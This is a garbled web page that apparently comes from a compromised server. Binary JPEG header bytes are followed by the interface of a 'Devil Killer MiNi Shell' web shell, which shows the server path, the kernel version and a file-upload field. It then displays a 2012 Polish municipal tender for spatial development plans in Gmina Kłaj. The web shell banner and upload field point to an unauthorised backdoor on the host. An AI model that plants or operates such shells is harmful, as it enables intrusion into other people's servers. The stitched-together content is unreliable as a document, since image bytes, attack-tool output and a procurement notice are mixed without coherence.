JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120516/157102-N-2012.html

<p class="kh_header"><b>Kłaj: OPRACOWANIE MIEJSCOWYCH PLANÓW ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY  KŁAJ</b><br>
<b>Numer ogłoszenia: 157102 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kłaj , 655, 32-015 Kłaj, woj. małopolskie, tel. 012 2841100 w. 36, faks 012 2841133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klaj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE MIEJSCOWYCH PLANÓW ZAGOSPODAROWANIA PRZESTRZENNEGO GMINY  KŁAJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest opracowanie miejscowych planów zagospodarowania przestrzennego Gminy Kłaj w granicach administracyjnych miejscowości: Dąbrowa, Kłaj, Łężkowice, Łysokanie i Szarów  i opracowanie zmian miejscowych planów zagospodarowania przestrzennego Gminy Kłaj dla miejscowości: Brzezie (dla obszarów: Brzezie -1, Brzezie -2, Brzezie -3, Brzezie -4 i Brzezie -5), Grodkowice (dla obszaru: Grodkowice-1) i Targowisko (dla obszarów: Targowisko-6 i Targowisko-7). Przedmiot i zakres planów i zmian planów określają uchwały Rady Gminy Kłaj:
Nr XVIII.107.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miejscowości Dąbrowa w jej granicach administracyjnych,
Nr XVIII.109.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miejscowości Kłaj w jej granicach administracyjnych,
Nr XVIII.110.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miejscowości Łężkowice w jej granicach administracyjnych,
Nr XVIII.111.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miejscowości Łysokanie w jej granicach administracyjnych,
Nr XVIII.112.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miejscowości Szarów w jej granicach administracyjnych,
Nr XVIII.106.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagos podarowania przestrzennego Gminy Kłaj dla obszarów: Brzezie-1, Brzezie-2, Brzezie-3, Brzezie-4 i Brzezie-5.
Nr XVIII.108.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego Gminy Kłaj dla obszaru: Grodkowice-1,
Nr XVIII.113.2012 z dnia 09 marca 2012r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego Gminy Kłaj dla obszaru: Targowisko-6, 
Nr XIX.126.2012 z dnia 27 marca 2012r. w sprawie przystąpienia do sporządzenia zmian miejscowego planu zagospodarowania przestrzennego Gminy Kłaj dla obszaru: Targowisko-7.
Projekty planów i zmian planów należy opracować zgodnie z obowiązującymi przepisami prawa, a w szczególności z przepisami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U.Nr 80, poz.717 z późn.zm.), przepisami wykonawczymi do ww. ustawy, przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska, oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.) oraz biorąc pod uwagę złożone dotychczas wnioski właścicieli nieruchomości.
Należy w szczególności uwzględnić uwarunkowania wynikające ze zmian struktury przestrzennej gminy ,jakie nastąpiły w wyniku realiazacji autostrady A-4 na terenie gminy (zmiany faktyczne i prawne, w tym prowadzona procedura scaleniowa).

1. Ogólna powierzchnia Gminy Kłaj wynosi  6498 ha, a liczba mieszkańców 10 180.
2. Szczegółowy zakres prac i terminy płatności określa Harmonogram rzeczowo-terminowy stanowiący załącznik nr 1 do projektu umowy.
3. Ostateczny projekt  miejscowego planu zagospodarowania przestrzennego (dla każdej z ww. miejscowości) zostanie przekazany Zamawiającemu w 5 egzemplarzach papierowych (w tym jeden umożliwiający ekspozycję i jeden umożliwiający kopiowanie) oraz w wersji elektronicznej - zapis na płycie CD - 2 szt. Część graficzna planów w programie EWMAPA wersja 10 lub wyższa, w formie wektorowej oraz rastrowej- .evr oraz .jpg; część tekstowa w formacie .doc oraz .xml.
4.Przedmiot zamówienia obejmuje swoim zakresem: wszelkie czynności i koszty związane z opracowaniem zmian miejscowego planu zagospodarowania przestrzennego (dla każdej z ww. miejscowości), w szczególności:
- sporządzenie tekstu i rysunku zmiany planu w odpowiedniej skali zgodnie z wymogami ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym, w szczególności w zakresie ustalonym w art. 15 powołanej ustawy i zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego oraz zgodnie z przepisami innych ustaw związanych z problematyką planu ( Dz. U nr 164 poz. 1587), sporządzenie opracowania ekofizjograficznego zgodnie z Rozporządzeniem Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych (Dz. U z 2002r. Nr 155 poz. 1298),
przeprowadzenie strategicznej oceny oddziaływania na środowisko, o której mowa w art. 46 pkt. 1 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zm.),
sporządzenie prognozy skutków finansowych uchwalenia planu, uwzględniającej wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego, ustalenie przeznaczenia terenów (w tym dla inwestycji celu publicznego) oraz określenie sposobów ich zagospodarowania i zabudowy na obszarze opracowania, zgodnie z uchwałą Rady Gminy Kłaj  i wymaganiami określonymi w rozporządzeniu Ministra Infrastruktury z dnia z 26 sierpnia 2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1588),sporządzenie dokumentacji dotyczącej wniosku o zgodę na zmianę przeznaczenia gruntów rolnych na cele nierolnicze oraz gruntów leśnych na cele nieleśne, zgodnie z przepisami ustawy z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (Dz. U. z 2004 r. Nr 121, poz. 1266 z późn. zm.), o ile zaistnieje taka potrzeba, skompletowanie dokumentacji prac planistycznych zgodnie z § 12 cytowanego rozporządzenia w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego.
W ramach realizacji przedmiotu zamówienia wykonawca zobowiązany jest do opracowania wszelkich dokumentów oraz podjęcia wszelkich czynności wynikających z procedur związanych ze sporządzeniem projektu zmian miejscowego planu zagospodarowania przestrzennego, w tym w szczególności:
wykonanie analizy wniosków właścicieli nieruchomości złożonych w związku z przystąpieniem Zamawiającego do zmiany planu miejscowego oraz opracowanie propozycji ich rozpatrzenia, opracowanie projektu zmiany planu miejscowego z rozpatrzeniem uwag władz gminy oraz mieszkańców, opracowanie prognozy oddziaływania na środowisko, przedstawienie projektu zmiany planu miejscowego wraz z całą dokumentacja, w tym prognozą oddziaływania na środowisko oraz prognozą skutków finansowych uchwalenia zmiany planu miejscowego, do zaopiniowania Gminnej Komisji Urbanistyczno-Architektonicznej,
analiza potrzeby opracowania wniosków o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych oraz opracowanie wniosków o zgodę na zmianę przeznaczenia gruntów rolnych na cele nierolnicze (w zależności od warunków analizy),
przygotowanie projektu wystąpienia o zaopiniowanie projektu zmiany planu miejscowego wraz z rozdzielnikiem oraz kopiami projektu zmiany planu wraz prognozami oddziaływania na środowisko, przygotowanie projektu wystąpienia o uzgodnienie projektu zmiany planu miejscowego wraz z rozdzielnikiem oraz kopiami projektu zmiany planu miejscowego wraz z prognozami oddziaływania na środowisko,
opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach,
wprowadzenie zmian do tekstu i rysunku projektu zmiany planu miejscowego wynikających z uwzględnionych uwag zawartych w opiniach i zmian wynikających z dokonanych uzgodnień, w sposób uzgodniony z władzami Gminy,
opracowanie zmiany prognozy oddziaływania na środowisko, w związku ze zmianami w projekcie zmiany planu miejscowego, opracowanie zmiany prognozy skutków finansowych uchwalenia zmiany planu miejscowego, w związku ze zmianami w projekcie zmiany planu miejscowego, opracowanie projektów ogłoszenia prasowego i obwieszczenia o wyłożeniu projektu zmiany planu miejscowego wraz z prognozą oddziaływania na środowisko, do publicznego wglądu, obsługa wyłożenia projektu zmiany planu miejscowego do publicznego wglądu (minimum 1 raz w tygodniu),
zorganizowanie oraz udział w dyskusji publicznej nad, przyjętymi w projekcie zmiany planu miejscowego, rozwiązaniami i sporządzenie protokołów z tych dyskusji,
sporządzenie wykazu uwag wzniesionych do wyłożonego do publicznego wglądu projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, analiza tych uwag i opracowanie propozycji ich rozpatrzenia, udział w posiedzeniach organów Gminy i komisji Rady dotyczących rozpoznania uwag wniesionych w związku z wyłożeniem do publicznego wglądu projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, osobisty udział Wykonawcy we wszelkich spotkaniach, dyskusjach, konsultacjach związanych ze sprawą zmiany miejscowego planu na każde wezwanie Zamawiającego, wprowadzenie zmian do projektu zmiany planu miejscowego wynikających z rozpatrzenia uwag wniesionych po wyłożeniu planu, przedstawienie Radzie Gminy projektu zmiany miejscowego planu wraz z listą nieuwzględnionych uwag wniesionych po wyłożeniu planu,
przygotowywanie projektów uchwał Rady Gminy związanych z uchwaleniem zmiany planu miejscowego, ponowne przeprowadzenie czynności określonych w art. 17 ustawy z dnia 27 marca 2002 r. o planowaniu i zagospodarowaniu przestrzennym, dla części projektu zmiany planu miejscowego, jeżeli Rada Gminy stwierdzi konieczność dokonania zmiany, w zakresie niezbędnych do dokonania tych zmian (przygotowanie projektu wystąpienia o ponownie zaopiniowanie i o ponowne uzgodnienie wraz z rozdzielnikiem oraz kopiami projektu zmiany planu miejscowego i prognozy oddziaływania na środowisko, opracowanie stanowiska w sprawie uwag zawartych w opiniach i uzgodnieniach, przygotowanie listy nieuwzględnionych uwag), wprowadzenie zmian do tekstu i rysunku projektu zmiany planu miejscowego, odpowiednio do uwzględnionych uwag zawartych w uzasadnionych prawnie stanowiskach podmiotów uzgadniających, w sposób ustalony z władzami Gminy itp., przygotowanie projektu uchwały o zgodności projektu zmiany planu miejscowego z ustaleniami studium, przygotowanie projektu rozstrzygnięcia o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które należą do zadań własnych Gminy oraz zasad ich finansowania,
skompletowanie, uporządkowanie i oprawienie dokumentacji prac planistycznych, przygotowanie projektu wystąpienia do Wojewody w sprawie oceny zgodności z przepisami prawnymi uchwały Rady Gminy wraz z załącznikami, przygotowanie potrzebnej ilości materiałów roboczych - odpowiedniej m.in. do uzgodnień, opinii, konsultacji, dyskusji publicznej, przygotowanie cyfrowego zapisu części tekstowej oraz kopii rysunku planu według wymogów urzędu wydającego dziennik urzędowy województwa,
Wszystkie prace projektowe lub czynności nieopisane, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz w przepisach odrębnych, a niezbędnych do prawidłowego i kompletnego opracowania dokumentacji projektowej należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.
Przedmiot zamówienia obejmuje również wykonanie i przekazanie Zamawiającemu dodatkowych egzemplarzy projektów zmian planu na poszczególnych etapach prac:
2 egz. papierowe + 2 egz. na dwóch płytach CD wstępnej koncepcji zmiany planu zagospodarowania przestrzennego,
2 egz. papierowe + 2 egz. na dwóch płytach CD dla każdego wyłożenia projektu zmiany planu zagospodarowania przestrzennego do publicznego wglądu.
Przed sporządzeniem oferty zaleca się, aby Wykonawca zapoznał się z opracowaniami będącymi w posiadaniu Zamawiającego, tj. Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy, Strategią rozwoju Gminy, obowiązującymi miejscowymi planami zagospodarowania przestrzennego Gminy Kłaj na danym obszarze. Kopie tych dokumentów po rozstrzygnięciu postępowania o udzielenie zamówienia publicznego i podpisaniu umowy z Wykonawcą zostaną przez Zamawiającego przekazane Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust 1 pkt. 6 ustawy Prawo zamówień publicznych, do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości: 4 000,0 zł          
(słownie: cztery tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunku udziału w postępowaniu o których mowa w art. 22 ust. 1 pkt 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy posiadają doświadczenie zawodowe                w zakresie prac planistycznych polegające na wykonaniu w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech zamówień publicznych obejmujących opracowanie  miejscowych planów zagospodarowania przestrzennego lub ich zmian -uchwalonych i ogłoszonych w Dzienniku Urzędowym odpowiedniego Województwa, w tym co najmniej jednego o wartości nie mniejszej niż 150.000,00 zł brutto.  - wraz z dokumentami potwierdzającymi, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania potencjałem technicznym: Zamawiający nie stawia wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
W zakresie osób zdolnych do wykonania zamówienia zamawiający wymaga aby Wykonawca dysponował następującymi osobami, tj. co najmniej jedną osobą posiadającą odpowiednie przygotowanie zawodowe i wpisaną na listę członków właściwej izby samorządu zawodowego, zgodnie z wymaganiami ustawy o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 oraz z 2002 r. Nr 23, poz. 221, Nr 153, poz. 1271 i Nr 240, poz. 2052), oraz wielobranżowym zespołem projektantów w zakresie infrastruktury, komunikacji, ochrony środowiska. Zamawiający wymaga , aby osoba wskazana przez wykonawcę jako kierownik zespołu projektowego / główny projektant planów posiadała doświadczenie zawodowe w zakresie nie mniejszym niż określone w pkt 3.2,
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz ofertowy - wzór formularza ofertowego stanowi Załącznik nr 1 do SIWZ, , (w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy firm oraz dokładne adresy wszystkich wykonawców, a także pełnomocnika),
